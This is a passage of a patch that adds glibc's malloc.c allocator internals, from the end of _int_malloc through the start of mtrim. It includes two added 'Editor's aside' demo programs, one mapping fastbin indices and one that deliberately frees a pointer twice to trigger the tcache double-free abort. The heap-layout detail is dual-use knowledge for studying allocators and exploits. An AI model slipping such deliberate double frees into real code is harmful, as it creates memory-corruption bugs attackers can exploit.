+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          if (__glibc_unlikely (fwd->bk_nextsize->fd_nextsize != fwd))
+                            malloc_printerr ("malloc(): largebin double linked list corrupted (nextsize)");
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                      if (bck->fd != fwd)
+                        malloc_printerr ("malloc(): largebin double linked list corrupted (bk)");
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
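+
+/* [Editor's aside -- illustrative sketch, not part of glibc.]  The fastbin
+   path at the top of _int_malloc only runs for nb <= get_max_fast (); by
+   default that limit is DEFAULT_MXFAST = 64 * SIZE_SZ / 4, i.e. chunk
+   sizes 0x20..0x80 on 64-bit targets, spread over fastbins 0..6.  The
+   demo below reproduces fastbin_index () for SIZE_SZ == 8.  Kept under
+   "#if 0"; build it as a separate program.  */
+#if 0
+#include <stdio.h>
+
+#define DEMO_SIZE_SZ        8UL
+#define DEMO_DEFAULT_MXFAST (64UL * DEMO_SIZE_SZ / 4)   /* 0x80 */
+
+/* Chunk size -> fastbin index, as fastbin_index () does when SIZE_SZ == 8.  */
+static unsigned
+demo_fastbin_index (unsigned long csz)
+{
+  return (unsigned) (csz >> 4) - 2;
+}
+
+int
+main (void)
+{
+  for (unsigned long csz = 32; csz <= DEMO_DEFAULT_MXFAST; csz += 16)
+    printf ("chunk size 0x%lx -> fastbin %u\n", csz, demo_fastbin_index (csz));
+  return 0;
+}
+#endif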
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wraps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size and a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
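+
+/* [Editor's aside -- illustrative sketch, not part of glibc.]  The
+   e->key == tcache test above is what turns a naive double free of a
+   tcache-sized chunk into an immediate abort.  On a libc that contains
+   this check (2.29-era upstream, plus distro 2.27 builds that backported
+   it), the standalone program below dies with "free(): double free
+   detected in tcache 2".  Kept under "#if 0"; build separately.  */
+#if 0
+#include <stdlib.h>
+
+int
+main (void)
+{
+  void *p = malloc (24);        /* 0x20 chunk; first free lands in tcache */
+  free (p);
+  free (p);                     /* same entry again: key check aborts */
+  return 0;
+}
+#endif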
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
+  mchunkptr       nextp;              /* next chunk to consolidate */
+  mchunkptr       unsorted_bin;       /* bin header */
+  mchunkptr       first_unsorted;     /* chunk to link to */
+
+  /* These have same use as in free() */
+  mchunkptr       nextchunk;
+  INTERNAL_SIZE_T size;
+  INTERNAL_SIZE_T nextsize;
+  INTERNAL_SIZE_T prevsize;
+  int             nextinuse;
+
+  atomic_store_relaxed (&av->have_fastchunks, false);
+
+  unsorted_bin = unsorted_chunks(av);
+
+  /*
+    Remove each chunk from its fast bin and consolidate it, then place
+    it in the unsorted bin. Among other reasons for doing this,
+    placing in unsorted bin avoids needing to calculate actual bins
+    until malloc is sure that chunks aren't immediately going to be
+    reused anyway.
+  */
+
+  maxfb = &fastbin (av, NFASTBINS - 1);
+  fb = &fastbin (av, 0);
+  do {
+    p = atomic_exchange_acq (fb, NULL);
+    if (p != 0) {
+      do {
+	{
+	  unsigned int idx = fastbin_index (chunksize (p));
+	  if ((&fastbin (av, idx)) != fb)
+	    malloc_printerr ("malloc_consolidate(): invalid chunk size");
+	}
+
+	check_inuse_chunk(av, p);
+	nextp = p->fd;
+
+	/* Slightly streamlined version of consolidation code in free() */
+	size = chunksize (p);
+	nextchunk = chunk_at_offset(p, size);
+	nextsize = chunksize(nextchunk);
+
+	if (!prev_inuse(p)) {
+	  prevsize = prev_size (p);
+	  size += prevsize;
+	  p = chunk_at_offset(p, -((long) prevsize));
+	  if (__glibc_unlikely (chunksize(p) != prevsize))
+	    malloc_printerr ("corrupted size vs. prev_size in fastbins");
+	  unlink_chunk (av, p);
+	}
+
+	if (nextchunk != av->top) {
+	  nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+	  if (!nextinuse) {
+	    size += nextsize;
+	    unlink_chunk (av, nextchunk);
+	  } else
+	    clear_inuse_bit_at_offset(nextchunk, 0);
+
+	  first_unsorted = unsorted_bin->fd;
+	  unsorted_bin->fd = p;
+	  first_unsorted->bk = p;
+
+	  if (!in_smallbin_range (size)) {
+	    p->fd_nextsize = NULL;
+	    p->bk_nextsize = NULL;
+	  }
+
+	  set_head(p, size | PREV_INUSE);
+	  p->bk = unsorted_bin;
+	  p->fd = first_unsorted;
+	  set_foot(p, size);
+	}
+
+	else {
+	  size += nextsize;
+	  set_head(p, size | PREV_INUSE);
+	  av->top = p;
+	}
+
+      } while ( (p = nextp) != 0);
+
+    }
+  } while (fb++ != maxfb);
+}
+
+/*
+  ------------------------------ realloc ------------------------------
+*/
+
+void*
+_int_realloc(mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
+	     INTERNAL_SIZE_T nb)
+{
+  mchunkptr        newp;            /* chunk to return */
+  INTERNAL_SIZE_T  newsize;         /* its size */
+  void*          newmem;          /* corresponding user mem */
+
+  mchunkptr        next;            /* next contiguous chunk after oldp */
+
+  mchunkptr        remainder;       /* extra space at end of newp */
+  unsigned long    remainder_size;  /* its size */
+
+  /* oldmem size */
+  if (__builtin_expect (chunksize_nomask (oldp) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (oldsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid old size");
+
+  check_inuse_chunk (av, oldp);
+
+  /* All callers already filter out mmap'ed chunks.  */
+  assert (!chunk_is_mmapped (oldp));
+
+  next = chunk_at_offset (oldp, oldsize);
+  INTERNAL_SIZE_T nextsize = chunksize (next);
+  if (__builtin_expect (chunksize_nomask (next) <= 2 * SIZE_SZ, 0)
+      || __builtin_expect (nextsize >= av->system_mem, 0))
+    malloc_printerr ("realloc(): invalid next size");
+
+  if ((unsigned long) (oldsize) >= (unsigned long) (nb))
+    {
+      /* already big enough; split below */
+      newp = oldp;
+      newsize = oldsize;
+    }
+
+  else
+    {
+      /* Try to expand forward into top */
+      if (next == av->top &&
+          (unsigned long) (newsize = oldsize + nextsize) >=
+          (unsigned long) (nb + MINSIZE))
+        {
+          set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+          av->top = chunk_at_offset (oldp, nb);
+          set_head (av->top, (newsize - nb) | PREV_INUSE);
+          check_inuse_chunk (av, oldp);
+          return chunk2mem (oldp);
+        }
+
+      /* Try to expand forward into next chunk;  split off remainder below */
+      else if (next != av->top &&
+               !inuse (next) &&
+               (unsigned long) (newsize = oldsize + nextsize) >=
+               (unsigned long) (nb))
+        {
+          newp = oldp;
+          unlink_chunk (av, next);
+        }
+
+      /* allocate, copy, free */
+      else
+        {
+          newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
+          if (newmem == 0)
+            return 0; /* propagate failure */
+
+          newp = mem2chunk (newmem);
+          newsize = chunksize (newp);
+
+          /*
+             Avoid copy if newp is next chunk after oldp.
+           */
+          if (newp == next)
+            {
+              newsize += oldsize;
+              newp = oldp;
+            }
+          else
+            {
+	      memcpy (newmem, chunk2mem (oldp), oldsize - SIZE_SZ);
+              _int_free (av, oldp, 1);
+              check_inuse_chunk (av, newp);
+              return chunk2mem (newp);
+            }
+        }
+    }
+
+  /* If possible, free extra space in old or extended chunk */
+
+  assert ((unsigned long) (newsize) >= (unsigned long) (nb));
+
+  remainder_size = newsize - nb;
+
+  if (remainder_size < MINSIZE)   /* not enough extra to split off */
+    {
+      set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+    }
+  else   /* split remainder */
+    {
+      remainder = chunk_at_offset (newp, nb);
+      set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_head (remainder, remainder_size | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      /* Mark remainder as inuse so free() won't complain */
+      set_inuse_bit_at_offset (remainder, remainder_size);
+      _int_free (av, remainder, 1);
+    }
+
+  check_inuse_chunk (av, newp);
+  return chunk2mem (newp);
+}
+
+/*
+   ------------------------------ memalign ------------------------------
+ */
+
+static void *
+_int_memalign (mstate av, size_t alignment, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;             /* padded  request size */
+  char *m;                        /* memory returned by malloc call */
+  mchunkptr p;                    /* corresponding chunk */
+  char *brk;                      /* alignment point within p */
+  mchunkptr newp;                 /* chunk to return */
+  INTERNAL_SIZE_T newsize;        /* its size */
+  INTERNAL_SIZE_T leadsize;       /* leading space before alignment point */
+  mchunkptr remainder;            /* spare room at end to split off */
+  unsigned long remainder_size;   /* its size */
+  INTERNAL_SIZE_T size;
+
+
+
+  if (!checked_request2size (bytes, &nb))
+    {
+      __set_errno (ENOMEM);
+      return NULL;
+    }
+
+  /*
+     Strategy: find a spot within that chunk that meets the alignment
+     request, and then possibly free the leading and trailing space.
+   */
+
+  /* Call malloc with worst case padding to hit alignment. */
+
+  m = (char *) (_int_malloc (av, nb + alignment + MINSIZE));
+
+  if (m == 0)
+    return 0;           /* propagate failure */
+
+  p = mem2chunk (m);
+
+  if ((((unsigned long) (m)) % alignment) != 0)   /* misaligned */
+    {
+      /* Find an aligned spot inside chunk.  Since we need to give back
+         leading space in a chunk of at least MINSIZE, if the first
+         calculation places us at a spot with less than MINSIZE leader,
+         we can move to the next aligned spot -- we've allocated enough
+         total room so that this is always possible.  */
+      brk = (char *) mem2chunk (((unsigned long) (m + alignment - 1)) &
+                                - ((signed long) alignment));
+      if ((unsigned long) (brk - (char *) (p)) < MINSIZE)
+        brk += alignment;
+
+      newp = (mchunkptr) brk;
+      leadsize = brk - (char *) (p);
+      newsize = chunksize (p) - leadsize;
+
+      /* For mmapped chunks, just adjust offset */
+      if (chunk_is_mmapped (p))
+        {
+          set_prev_size (newp, prev_size (p) + leadsize);
+          set_head (newp, newsize | IS_MMAPPED);
+          return chunk2mem (newp);
+        }
+
+      /* Otherwise, give back leader, use the rest */
+      set_head (newp, newsize | PREV_INUSE |
+                (av != &main_arena ? NON_MAIN_ARENA : 0));
+      set_inuse_bit_at_offset (newp, newsize);
+      set_head_size (p, leadsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
+      _int_free (av, p, 1);
+      p = newp;
+
+      assert (newsize >= nb &&
+              (((unsigned long) (chunk2mem (p))) % alignment) == 0);
+    }
+
+  /* Also give back spare room at the end */
+  if (!chunk_is_mmapped (p))
+    {
+      size = chunksize (p);
+      if ((unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (p, nb);
+          set_head (remainder, remainder_size | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head_size (p, nb);
+          _int_free (av, remainder, 1);
+        }
+    }
+
+  check_inuse_chunk (av, p);
+  return chunk2mem (p);
+}
+
+
+/*
+   ------------------------------ malloc_trim ------------------------------
+ */
+
+static int
+mtrim (mstate av, size_t pad)
+{
+  /* Ensure all blocks are consolidated.  */
+  malloc_consolidate (av);
+
+  const size_t ps = GLRO (dl_pagesize);
+  int psindex = bin_index (ps);
+  const size_t psm1 = ps - 1;
+
+  int result = 0;
+  for (int i = 1; i < NBINS; ++i)
+    if (i == 1 || i >= psindex)
+      {
+        mbinptr bin = bin_at (av, i);
+
+        for (mchunkptr p = last (bin); p != bin; p = p->bk)
+          {
+            INTERNAL_SIZE_T size = chunksize (p);
+
+            if (size > psm1 + sizeof (struct malloc_chunk))
